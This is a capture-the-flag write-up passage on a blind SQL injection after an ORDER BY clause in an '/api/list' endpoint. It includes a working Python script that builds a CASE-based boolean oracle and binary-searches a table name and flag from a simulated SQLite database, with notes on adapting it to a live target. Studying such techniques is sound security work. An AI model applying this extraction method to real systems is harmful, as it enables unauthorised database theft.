The server was vulnerable to SQL injection in the /api/list API endpoint, which allowed the flag to be recovered. Exploitation was fairly laborious because the injection point sat after an ORDER BY clause: that position accepts only an expression, not a further SELECT or UNION, so the data has to be extracted blind by making the injected expression change the sort order of the returned rows.

Using a Python script, we can automate the process of discovering the name of the flag table and then the flag's contents.
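The following is an added example of that automation, not the script from the original writeup. It assumes the backend is SQLite and simulates the /api/list handler with an in-memory database, so it runs offline; the table name, column name and flag value are constructed for the demonstration. The injected CASE expression sorts by id when a condition is true and by -id when it is false, which turns the first returned row's id into a boolean oracle; the script then binary-searches the length and each character of a scalar subquery, first against sqlite_master for the table name, then against that table for the flag.

```python
import sqlite3

# Constructed stand-in for the challenge database. The real schema, table name
# and flag are not known from the page and are invented here for the demo.
FLAG_TABLE = "flag_7f3a9c"
FLAG_VALUE = "CHTB{constructed_example_flag}"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE emojis (id INTEGER PRIMARY KEY, name TEXT, count INTEGER)")
    con.executemany(
        "INSERT INTO emojis (name, count) VALUES (?, ?)",
        [("grinning", 12), ("fire", 40), ("snake", 7), ("crab", 3)],
    )
    con.execute(f"CREATE TABLE {FLAG_TABLE} (flag TEXT)")
    con.execute(f"INSERT INTO {FLAG_TABLE} VALUES (?)", (FLAG_VALUE,))
    con.commit()
    return con


def vulnerable_list(con, order):
    """Simulates the /api/list handler: the caller-controlled 'order' value is
    concatenated straight after ORDER BY, which is the injection point."""
    return con.execute(f"SELECT id, name, count FROM emojis ORDER BY {order}").fetchall()


def make_oracle(list_fn):
    """Turn the ORDER BY injection into a boolean oracle. When the condition is
    true the rows are sorted by id (first row id = 1); when it is false or NULL
    they are sorted by -id (first row id = highest)."""
    def oracle(cond):
        rows = list_fn(f"(CASE WHEN ({cond}) THEN id ELSE -id END)")
        return rows[0][0] == 1
    return oracle


def blind_int(oracle, expr, hi=255):
    """Binary-search the integer value of a SQL expression in [0, hi]."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(oracle, subquery, max_len=64):
    """Extract the string returned by a scalar subquery: first its length, then
    the code point of each character via unicode(substr(...))."""
    length = blind_int(oracle, f"length(({subquery}))", hi=max_len)
    return "".join(
        chr(blind_int(oracle, f"unicode(substr(({subquery}), {i}, 1))", hi=127))
        for i in range(1, length + 1)
    )


def recover_flag(list_fn):
    """Run the two-stage extraction against a function that issues the ORDER BY
    injection (here the simulated endpoint; against a live target this would
    wrap an HTTP request to /api/list)."""
    oracle = make_oracle(list_fn)
    # Stage 1: table name from SQLite's schema catalogue (assumption: it starts with 'flag').
    table = blind_string(
        oracle, "SELECT name FROM sqlite_master WHERE type='table' AND name LIKE 'flag%'"
    )
    # Stage 2: the flag itself (assumption: a single column named 'flag').
    flag = blind_string(oracle, f"SELECT flag FROM {table} LIMIT 1")
    return table, flag


if __name__ == "__main__":
    con = make_db()
    table, flag = recover_flag(lambda order: vulnerable_list(con, order))
    print(f"table={table} flag={flag}")
```

Against a real target, replace `vulnerable_list` with a function that sends the injected string in the sorted parameter of /api/list and parses the JSON response; the parameter name and response shape are not given on this page and would have to be confirmed from the challenge. Binary search over `unicode(substr(...))` needs about seven requests per character instead of one per candidate character, which is what makes a blind ORDER BY extraction tolerable.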

Original writeup (https://http418infosec.com/htb-cyber-apocalypse-emoji-voting-writeup).